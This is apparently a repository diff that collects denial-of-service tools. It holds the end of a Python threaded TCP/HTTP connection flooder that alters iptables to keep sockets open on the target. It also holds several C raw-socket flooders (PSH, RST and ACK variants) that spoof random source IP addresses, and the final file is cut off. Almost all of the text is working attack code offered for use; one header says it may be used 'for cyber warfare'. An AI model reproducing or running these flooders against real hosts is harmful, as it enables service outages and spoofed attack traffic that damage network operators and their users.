optional.add_argument('-t', dest='THREADS', type=int, default=300, help='Threads, default = 300 threads')
|
||||
optional.add_argument('-ssl', action='store_true', help='Enable SSL')
|
||||
optional.add_argument('-http', action='store_true', help='Enable HTTP headers (only if custom payload not set)')
|
||||
optional.add_argument('-payload', help='Set payload as hex-string')
|
||||
|
||||
|
||||
|
||||
print("\nKittenz launcher.\n")
|
||||
args = parser.parse_args()
|
||||
connected = 0
|
||||
dropped = 0
|
||||
payloads = 0
|
||||
port = args.port
|
||||
|
||||
|
||||
# Sort out http URI in targets
|
||||
target = args.target.replace('http://','').replace('https://','')
|
||||
|
||||
if '/' in target and args.http:
|
||||
path = target[target.find('/'):]
|
||||
target = target[:target.find('/')]
|
||||
else:
|
||||
path = '/'
|
||||
|
||||
|
||||
# Decode custom payload
|
||||
try:
|
||||
if args.payload:
|
||||
payload = args.payload.decode('hex')
|
||||
else:
|
||||
payload = ''
|
||||
except:
|
||||
print('Use hex string format as payload.')
|
||||
sys.exit()
|
||||
|
||||
|
||||
# Check if script is running as root
|
||||
if geteuid() != 0:
|
||||
print("Run %s as root." % sys.argv[0])
|
||||
sys.exit()
|
||||
|
||||
|
||||
# Catch CTRL+C to abort
|
||||
stop = False
|
||||
def signal_handler(signal, frame):
|
||||
global stop
|
||||
stop = True
|
||||
signal.signal(signal.SIGINT, signal_handler)
|
||||
|
||||
|
||||
# String generator for Cache bypassing on load balancers (Random letters in lenght 3 to 8)
|
||||
def string_generator(size=random.randint(3, 8), chars=string.ascii_uppercase + string.ascii_lowercase):
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
|
||||
# Generate HTTP Payload
|
||||
def http_payload():
|
||||
payload = 'GET %s?%s HTTP/1.1\r\n' % (path, string_generator())
|
||||
payload += 'Host: %s\r\n' % target
|
||||
payload += 'User-Agent: Kittenz Launcher!!!\r\n'
|
||||
payload += 'Connection: keep-alive\r\n\r\n'
|
||||
return payload
|
||||
|
||||
|
||||
# DOS function
|
||||
def spam(target_ip, payload):
|
||||
global connected, dropped, payloads
|
||||
while True:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
# 2 sec TCP timeout
|
||||
s.settimeout(2)
|
||||
try:
|
||||
s.connect((target_ip, port))
|
||||
connected += 1
|
||||
# Wrap connection with SSL if specified
|
||||
if args.ssl:
|
||||
s = ssl.wrap_socket(s, cert_reqs = ssl.CERT_NONE)
|
||||
if args.http and not args.payload:
|
||||
payload = http_payload()
|
||||
s.send(payload)
|
||||
payloads += 1
|
||||
s.close()
|
||||
except:
|
||||
dropped += 1
|
||||
if stop == True:
|
||||
break
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
target_ip = socket.gethostbyname(target)
|
||||
# add IP tables to drop FIN and RST packets towards TARGET
|
||||
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
|
||||
system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))
|
||||
# Fire up threads running spam() function
|
||||
threads = []
|
||||
for i in range(args.THREADS):
|
||||
t = Thread(target=spam, args=(target_ip, payload,))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
|
||||
while True:
|
||||
# Keep going until ctrl+c is pressed
|
||||
if active_count() == 1 or stop == True:
|
||||
# when ctrl+c is pressed, restore IP tables.
|
||||
system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port ))
|
||||
system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port ))
|
||||
print("")
|
||||
break
|
||||
else:
|
||||
sleep(0.1)
|
||||
sys.stdout.write('Connects: %d, Payloads: %d, Dropped: %d \r' % (connected, payloads, dropped))
|
||||
sys.stdout.flush()
|
|
@ -0,0 +1,194 @@
|
|||
/*
|
||||
This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->psh = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (rand() % 20480);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, ":: cant open raw socket. got root?\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons (rand() % 20480);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, ":: motherfucking error.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, ":: sending all the packets..\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,194 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->rst = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons (rand() % 20480);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, ":: cant open raw socket. got root?\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons (rand() % 20480);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, ":: motherfucking error.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <IP> <threads> <throttle, -1 for no throttle> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, ":: sending all the packets..\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,216 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 65534
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = rand();
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = rand();
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->ack = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = rand();
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = rand();
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 5){
|
||||
fprintf(stderr, "Improper ACK flood parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[3]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 100;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[4])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,218 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products. ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
